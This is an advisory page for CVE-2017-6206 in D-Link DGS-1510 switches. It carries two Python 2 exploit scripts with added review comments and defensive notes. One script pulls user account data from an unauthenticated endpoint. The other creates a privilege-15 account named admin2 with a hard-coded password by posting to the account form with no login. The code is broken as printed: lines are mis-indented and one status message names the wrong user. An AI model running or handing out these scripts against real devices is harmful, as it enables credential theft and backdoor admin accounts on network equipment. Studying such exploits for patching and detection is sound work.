
Multiple D-Link Products Unspecified Information Disclosure Vulnerability(CVE-2017-6206)

🗓️ 22 Mar 2017 00:00:00Reported by 名匿Type 
seebug
 seebug
🔗 www.seebug.org👁 24 Views

Information Disclosure Vulnerability in D-Link Products, CVE-2017-6206

Related
Code
ReporterTitlePublishedViews
Family
0day.today
D-Link DGS-1510 Exploit
21 Mar 201700:00
zdt
Circl
CVE-2017-6206
20 Mar 201700:00
circl
CNVD
Multiple D-Link DGS-1510 Websmart Information Disclosure Vulnerabilities
24 Feb 201700:00
cnvd
CVE
CVE-2017-6206
23 Feb 201706:16
cve
Cvelist
CVE-2017-6206
23 Feb 201706:16
cvelist
NVD
CVE-2017-6206
23 Feb 201706:59
nvd
OSV
CVE-2017-6206
23 Feb 201706:59
osv
Prion
Information disclosure
23 Feb 201706:59
prion

                                                ================
get-user-info.py
================
 
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
 
def make_requests():
    """Issue the single request built by request_ip() and print the body.

    request_ip() fills the one-element ``response`` list. When it returns
    True the body is decoded with read_response() and printed as-is; neither
    the HTTP status nor the content is inspected before printing.
    """
    # One-element list used as an out-parameter for request_ip().
    response = [None]
    responseText = None
 
    if(request_ip(response)):
        # request_ip() also returns True when the server answered with an
        # HTTP error status, so the printed text may be an error page and is
        # not by itself evidence that the device is affected.
        responseText = read_response(response[0])
                # NOTE(review): as printed on this page the next line is
                # indented deeper than its siblings and uses the Python 2
                # print statement.
                print responseText
        response[0].close()
    else:
        # No HTTP response was obtained (connection failure or any other
        # exception inside request_ip()); nothing is reported to the user.
        pass
 
 
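def read_response(response):
    """Return the decoded body of an HTTP response as a byte string.

    Only the ``gzip`` and ``deflate`` content encodings are undone; any other
    value, or a missing header, returns the body exactly as read.

    response -- object exposing ``info()`` (header mapping) and ``read()``.
    """
    # Look the header up once instead of once per branch.
    encoding = response.info().get('Content-Encoding')
    # The body comes from a remote device and is not size-limited here, so a
    # small compressed payload can expand to a large one in memory.
    payload = response.read()

    if encoding == 'gzip':
        # The body is binary: BytesIO (already imported by this file) is the
        # right wrapper, whereas StringIO is text-oriented.
        return gzip.GzipFile(fileobj=BytesIO(payload)).read()

    if encoding == 'deflate':
        # Negative wbits selects a raw deflate stream with no zlib header.
        inflater = zlib.decompressobj(-zlib.MAX_WBITS)
        return inflater.decompress(payload) + inflater.flush()

    return payload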
 
 
def request_ip(response):
    """Send one GET to the account data-store path and report whether any HTTP response came back.

    URL requested:
    http://ip_address/DataStore/990_user_account.js?index=0&pagesize=10

    response -- one-element list used as an out-parameter; slot 0 is reset to
    None and then set to the response object, or to the HTTPError object when
    the server answered with an error status.

    Returns True whenever an HTTP response of any status was received, False
    on connection failure or any other exception.

    Defensive note: the request carries no credential or session cookie (the
    only cookie is ``Language=en``). Requests for this path from clients with
    no logged-in session are therefore worth alerting on in logs for the
    management interface, which should be reachable only from a restricted
    management network and run the vendor's fixed firmware for CVE-2017-6206.
    """
    response[0] = None
 
    try:
        # Create request to URL.
                # NOTE(review): these three lines are indented deeper than
                # their siblings as printed on this page. The target is taken
                # from the first command-line argument without validation; a
                # missing argument raises IndexError, which the bare except
                # below turns into a silent False.
                import sys
                ip = sys.argv[1]
                print ip
        req = urllib2.Request("http://%s/DataStore/990_user_account.js?index=0&pagesize=10"% ip)
 
        # Set request headers. They imitate a browser XHR issued from the
        # login page. "sdch" is advertised in Accept-Encoding although
        # read_response() only decodes gzip and deflate.
        req.add_header("Connection", "keep-alive")
        req.add_header("Accept", "text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01")
        req.add_header("X-Requested-With", "XMLHttpRequest")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.59 Safari/537.36")
        req.add_header("Referer", "http://%s/www/login.html"% ip)
        req.add_header("Accept-Encoding", "gzip, deflate, sdch")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
        req.add_header("Cookie", "Language=en")
 
        # Get response to request. No timeout is passed, so the call can
        # block for as long as the socket default allows.
        response[0] = urllib2.urlopen(req)
 
    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
        # In that case the error object itself is handed back as the response
        # and the function still returns True.
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        # Bare except: every other exception is swallowed and reported only
        # as False.
        return False
 
    return True
 
 
# Runs when the file is imported as well as when it is executed directly;
# there is no __main__ guard.
make_requests()
 
===========
user_add.py
===========
 
import re
import os.path
import urllib2
import base64
import gzip
import zlib
from StringIO import StringIO
from io import BytesIO
 
def make_requests():
    """Issue the single request built by request_ip() and print a fixed status line.

    The response body is decoded into ``responseText`` but never inspected,
    so the printed message does not depend on what the device replied.
    """
    # One-element list used as an out-parameter for request_ip().
    response = [None]
    responseText = None
 
    if(request_ip(response)):
        # request_ip() returns True for any HTTP response, error statuses
        # included, so this branch does not prove the device accepted the form.
        responseText = read_response(response[0])
                # NOTE(review): the message names "dlinktest" while the form
                # body sent by request_ip() uses username=admin2. To confirm
                # whether a device was changed, check its own account list
                # rather than this output. The line is also indented deeper
                # than its siblings as printed on this page.
                print "Username dlinktest is successfully Added"
        response[0].close()
    else:
        # No HTTP response was obtained (connection failure or any other
        # exception inside request_ip()).
                print "locha"
        pass
 
 
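def read_response(response):
    """Return the decoded body of an HTTP response as a byte string.

    Only the ``gzip`` and ``deflate`` content encodings are undone; any other
    value, or a missing header, returns the body exactly as read.

    response -- object exposing ``info()`` (header mapping) and ``read()``.
    """
    # Look the header up once instead of once per branch.
    encoding = response.info().get('Content-Encoding')
    # The body comes from a remote device and is not size-limited here, so a
    # small compressed payload can expand to a large one in memory.
    payload = response.read()

    if encoding == 'gzip':
        # The body is binary: BytesIO (already imported by this file) is the
        # right wrapper, whereas StringIO is text-oriented.
        return gzip.GzipFile(fileobj=BytesIO(payload)).read()

    if encoding == 'deflate':
        # Negative wbits selects a raw deflate stream with no zlib header.
        inflater = zlib.decompressobj(-zlib.MAX_WBITS)
        return inflater.decompress(payload) + inflater.flush()

    return payload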
 
 
def request_ip(response):
    """Send one POST to the account form handler and report whether any HTTP response came back.

    URL requested:
    http://ip_address/form/User_Accounts_Apply

    response -- one-element list used as an out-parameter; slot 0 is reset to
    None and then set to the response object, or to the HTTPError object when
    the server answered with an error status.

    Returns True whenever an HTTP response of any status was received, False
    on connection failure or any other exception.

    Defensive note: the request carries no credential and no cookie at all,
    and its form body is fixed (see ``body`` below). POSTs to this path from
    clients with no logged-in session, and local accounts nobody provisioned,
    are the things to look for on affected devices; the management interface
    should be reachable only from a restricted management network and run the
    vendor's fixed firmware for CVE-2017-6206.
    """
    response[0] = None
 
    try:
        # Create request to URL.
                # NOTE(review): these two lines are indented deeper than their
                # siblings as printed on this page. The target is taken from
                # the first command-line argument without validation; a
                # missing argument raises IndexError, which the bare except
                # below turns into a silent False.
                import sys
                ip = sys.argv[1]
        req = urllib2.Request("http://%s/form/User_Accounts_Apply"% ip)
 
        # Set request headers. They imitate a browser form submission whose
        # Referer is the login page.
        req.add_header("Connection", "keep-alive")
        req.add_header("Cache-Control", "max-age=0")
        req.add_header("Origin", "http://%s/"% ip)
        req.add_header("Upgrade-Insecure-Requests", "1")
        req.add_header("User-Agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.51 Safari/537.36")
        req.add_header("Content-Type", "application/x-www-form-urlencoded")
        req.add_header("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
        req.add_header("Referer", "http://%s/www/login.html"% ip)
        req.add_header("Accept-Encoding", "gzip, deflate")
        req.add_header("Accept-Language", "en-US,en;q=0.8")
 
        # Set request body. The values are hard-coded; privilege=15 is
        # presumably the highest privilege level -- confirm against the
        # device documentation.
        body = "action=0&username=admin2&privilege=15&type=0&password=admin2"
 
        # Get response to request. Passing a body makes urllib2 send a POST.
        # No timeout is passed, so the call can block for as long as the
        # socket default allows.
        response[0] = urllib2.urlopen(req, body)
 
    except urllib2.URLError, e:
        # URLError.code existing indicates a valid HTTP response, but with a non-200 status code (e.g. 304 Not Modified, 404 Not Found)
        # In that case the error object itself is handed back as the response
        # and the function still returns True.
        if not hasattr(e, "code"):
            return False
        response[0] = e
    except:
        # Bare except: every other exception is swallowed and reported only
        # as False.
        return False
 
    return True
 
 
# Runs when the file is imported as well as when it is executed directly;
# there is no __main__ guard.
make_requests()
                              

22 Mar 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.46431
24